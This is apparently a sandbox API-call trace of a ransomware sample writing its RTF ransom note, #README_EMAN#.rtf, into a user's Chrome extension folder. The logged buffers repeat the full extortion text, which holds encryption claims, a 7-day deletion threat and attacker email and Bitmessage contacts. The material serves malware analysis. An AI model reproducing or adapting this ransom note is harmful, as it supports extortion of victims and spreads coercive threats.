DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0289.343] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2373dc8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nú¯Õ%\x048èõù^=«\x16O\x1fïж>\x9bXË\x7f\x83\x19", lpUsedDefaultChar=0x0) returned 8717 [0289.343] WriteFile (in: hFile=0x2e8, lpBuffer=0x2373dc8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2373dc8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0289.344] CloseHandle (hObject=0x2e8) returned 1 [0289.344] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\en\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\en\\#readme_eman#.rtf")) returned 0xffffffff [0289.344] GetLastError () returned 0x2 [0289.344] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\en\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\en\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2e8 [0289.345] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If 